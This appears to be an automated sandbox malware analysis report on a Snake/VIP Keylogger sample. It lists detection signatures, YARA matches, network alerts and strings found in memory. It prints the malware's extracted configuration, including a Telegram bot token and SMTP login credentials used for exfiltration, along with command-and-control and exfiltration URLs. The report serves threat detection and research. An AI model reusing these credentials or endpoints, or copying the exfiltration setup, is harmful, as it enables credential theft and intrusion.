Edit tour

Windows Analysis Report
n8l3NmC5EH.exe

Overview

General Information

Sample name:	n8l3NmC5EH.exe renamed because original name is a hash value
Original sample name:	616f692b5adbb3cd0beb80a87f9ca3baf91f44d4c979ef27d4ea1e909de8125a.exe
Analysis ID:	1632422
MD5:	7610a54bb35521b14064bb562d1c6afc
SHA1:	d1fa4d2715e348bf1eb3e13fcab31e7e65c9f4b0
SHA256:	616f692b5adbb3cd0beb80a87f9ca3baf91f44d4c979ef27d4ea1e909de8125a
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

n8l3NmC5EH.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)

n8l3NmC5EH.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)

n8l3NmC5EH.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)

n8l3NmC5EH.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d891:$a1: get_encryptedPassword 0x2dbba:$a2: get_encryptedUsername 0x2d6a1:$a3: get_timePasswordChanged 0x2d7aa:$a4: get_passwordField 0x2d8a7:$a5: set_encryptedPassword 0x2ef80:$a7: get_logins 0x2eee3:$a10: KeyLoggerEventArgs 0x2eb48:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x371c69:$a1: get_encryptedPassword 0x3b5289:$a1: get_encryptedPassword 0x3f86a9:$a1: get_encryptedPassword 0x371f92:$a2: get_encryptedUsername 0x3b55b2:$a2: get_encryptedUsername 0x3f89d2:$a2: get_encryptedUsername 0x371a79:$a3: get_timePasswordChanged 0x3b5099:$a3: get_timePasswordChanged 0x3f84b9:$a3: get_timePasswordChanged 0x371b82:$a4: get_passwordField 0x3b51a2:$a4: get_passwordField 0x3f85c2:$a4: get_passwordField 0x371c7f:$a5: set_encryptedPassword 0x3b529f:$a5: set_encryptedPassword 0x3f86bf:$a5: set_encryptedPassword 0x373358:$a7: get_logins 0x3b6978:$a7: get_logins 0x3f9d98:$a7: get_logins 0x3732bb:$a10: KeyLoggerEventArgs 0x3b68db:$a10: KeyLoggerEventArgs 0x3f9cfb:$a10: KeyLoggerEventArgs
Process Memory Space: n8l3NmC5EH.exe PID: 7500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 7500	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 7500	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 7500	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 7500	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8d275:$a1: get_encryptedPassword 0x8d4af:$a2: get_encryptedUsername 0x8d0a2:$a3: get_timePasswordChanged 0x8d19f:$a4: get_passwordField 0x8d28b:$a5: set_encryptedPassword 0x8f1f9:$a7: get_logins 0x8f171:$a10: KeyLoggerEventArgs 0x8ef07:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: n8l3NmC5EH.exe PID: 3180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 3180	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 3180	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: n8l3NmC5EH.exe PID: 3180	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x742f9:$a1: get_encryptedPassword 0x74618:$a2: get_encryptedUsername 0x74113:$a3: get_timePasswordChanged 0x7421c:$a4: get_passwordField 0x7430f:$a5: set_encryptedPassword 0x767ef:$a7: get_logins 0x76752:$a10: KeyLoggerEventArgs 0x763bb:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.n8l3NmC5EH.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.n8l3NmC5EH.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.n8l3NmC5EH.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.n8l3NmC5EH.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da91:$a1: get_encryptedPassword 0x2ddba:$a2: get_encryptedUsername 0x2d8a1:$a3: get_timePasswordChanged 0x2d9aa:$a4: get_passwordField 0x2daa7:$a5: set_encryptedPassword 0x2f180:$a7: get_logins 0x2f0e3:$a10: KeyLoggerEventArgs 0x2ed48:$a11: KeyLoggerEventArgsEventHandler
3.2.n8l3NmC5EH.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b8f7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3af9a:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b1f7:$a4: \Orbitum\User Data\Default\Login Data 0x3bbd6:$a5: \Kometa\User Data\Default\Login Data
3.2.n8l3NmC5EH.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e6d7:$s1: UnHook 0x2e6de:$s2: SetHook 0x2e6e6:$s3: CallNextHook 0x2e6f3:$s4: _hook
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc91:$a1: get_encryptedPassword 0x2bfba:$a2: get_encryptedUsername 0x2baa1:$a3: get_timePasswordChanged 0x2bbaa:$a4: get_passwordField 0x2bca7:$a5: set_encryptedPassword 0x2d380:$a7: get_logins 0x2d2e3:$a10: KeyLoggerEventArgs 0x2cf48:$a11: KeyLoggerEventArgsEventHandler
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39af7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3919a:$a3: \Google\Chrome\User Data\Default\Login Data 0x393f7:$a4: \Orbitum\User Data\Default\Login Data 0x39dd6:$a5: \Kometa\User Data\Default\Login Data
0.2.n8l3NmC5EH.exe.4c361d8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c8d7:$s1: UnHook 0x2c8de:$s2: SetHook 0x2c8e6:$s3: CallNextHook 0x2c8f3:$s4: _hook
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da91:$a1: get_encryptedPassword 0x710b1:$a1: get_encryptedPassword 0xb44d1:$a1: get_encryptedPassword 0x2ddba:$a2: get_encryptedUsername 0x713da:$a2: get_encryptedUsername 0xb47fa:$a2: get_encryptedUsername 0x2d8a1:$a3: get_timePasswordChanged 0x70ec1:$a3: get_timePasswordChanged 0xb42e1:$a3: get_timePasswordChanged 0x2d9aa:$a4: get_passwordField 0x70fca:$a4: get_passwordField 0xb43ea:$a4: get_passwordField 0x2daa7:$a5: set_encryptedPassword 0x710c7:$a5: set_encryptedPassword 0xb44e7:$a5: set_encryptedPassword 0x2f180:$a7: get_logins 0x727a0:$a7: get_logins 0xb5bc0:$a7: get_logins 0x2f0e3:$a10: KeyLoggerEventArgs 0x72703:$a10: KeyLoggerEventArgs 0xb5b23:$a10: KeyLoggerEventArgs
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b8f7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7ef17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2337:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3af9a:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e5ba:$a3: \Google\Chrome\User Data\Default\Login Data 0xc19da:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b1f7:$a4: \Orbitum\User Data\Default\Login Data 0x7e817:$a4: \Orbitum\User Data\Default\Login Data 0xc1c37:$a4: \Orbitum\User Data\Default\Login Data 0x3bbd6:$a5: \Kometa\User Data\Default\Login Data 0x7f1f6:$a5: \Kometa\User Data\Default\Login Data 0xc2616:$a5: \Kometa\User Data\Default\Login Data
0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e6d7:$s1: UnHook 0x71cf7:$s1: UnHook 0xb5117:$s1: UnHook 0x2e6de:$s2: SetHook 0x71cfe:$s2: SetHook 0xb511e:$s2: SetHook 0x2e6e6:$s3: CallNextHook 0x71d06:$s3: CallNextHook 0xb5126:$s3: CallNextHook 0x2e6f3:$s4: _hook 0x71d13:$s4: _hook 0xb5133:$s4: _hook
0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13d2d1:$a1: get_encryptedPassword 0x1808f1:$a1: get_encryptedPassword 0x1c3d11:$a1: get_encryptedPassword 0x13d5fa:$a2: get_encryptedUsername 0x180c1a:$a2: get_encryptedUsername 0x1c403a:$a2: get_encryptedUsername 0x13d0e1:$a3: get_timePasswordChanged 0x180701:$a3: get_timePasswordChanged 0x1c3b21:$a3: get_timePasswordChanged 0x13d1ea:$a4: get_passwordField 0x18080a:$a4: get_passwordField 0x1c3c2a:$a4: get_passwordField 0x13d2e7:$a5: set_encryptedPassword 0x180907:$a5: set_encryptedPassword 0x1c3d27:$a5: set_encryptedPassword 0x13e9c0:$a7: get_logins 0x181fe0:$a7: get_logins 0x1c5400:$a7: get_logins 0x13e923:$a10: KeyLoggerEventArgs 0x181f43:$a10: KeyLoggerEventArgs 0x1c5363:$a10: KeyLoggerEventArgs
0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13df17:$s1: UnHook 0x181537:$s1: UnHook 0x1c4957:$s1: UnHook 0x13df1e:$s2: SetHook 0x18153e:$s2: SetHook 0x1c495e:$s2: SetHook 0x13df26:$s3: CallNextHook 0x181546:$s3: CallNextHook 0x1c4966:$s3: CallNextHook 0x13df33:$s4: _hook 0x181553:$s4: _hook 0x1c4973:$s4: _hook
0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb56b1:$a1: get_encryptedPassword 0xf8cd1:$a1: get_encryptedPassword 0x13c0f1:$a1: get_encryptedPassword 0xb59da:$a2: get_encryptedUsername 0xf8ffa:$a2: get_encryptedUsername 0x13c41a:$a2: get_encryptedUsername 0xb54c1:$a3: get_timePasswordChanged 0xf8ae1:$a3: get_timePasswordChanged 0x13bf01:$a3: get_timePasswordChanged 0xb55ca:$a4: get_passwordField 0xf8bea:$a4: get_passwordField 0x13c00a:$a4: get_passwordField 0xb56c7:$a5: set_encryptedPassword 0xf8ce7:$a5: set_encryptedPassword 0x13c107:$a5: set_encryptedPassword 0xb6da0:$a7: get_logins 0xfa3c0:$a7: get_logins 0x13d7e0:$a7: get_logins 0xb6d03:$a10: KeyLoggerEventArgs 0xfa323:$a10: KeyLoggerEventArgs 0x13d743:$a10: KeyLoggerEventArgs
0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb62f7:$s1: UnHook 0xf9917:$s1: UnHook 0x13cd37:$s1: UnHook 0xb62fe:$s2: SetHook 0xf991e:$s2: SetHook 0x13cd3e:$s2: SetHook 0xb6306:$s3: CallNextHook 0xf9926:$s3: CallNextHook 0x13cd46:$s3: CallNextHook 0xb6313:$s4: _hook 0xf9933:$s4: _hook 0x13cd53:$s4: _hook
Click to see the 23 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:34:25.474834+0100	2803305	3	Unknown Traffic	192.168.2.5	49696	104.21.96.1	443	TCP
2025-03-07T23:34:36.548086+0100	2803305	3	Unknown Traffic	192.168.2.5	49704	104.21.96.1	443	TCP
2025-03-07T23:34:44.604278+0100	2803305	3	Unknown Traffic	192.168.2.5	49715	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:34:20.460325+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49694	193.122.130.0	80	TCP
2025-03-07T23:34:23.163473+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49694	193.122.130.0	80	TCP
2025-03-07T23:34:26.007258+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49697	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:34:46.867269+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49716	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:34:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: n8l3NmC5EH.exe, 00000003.00000002.3800131850.00000000065A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros;
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: n8l3NmC5EH.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
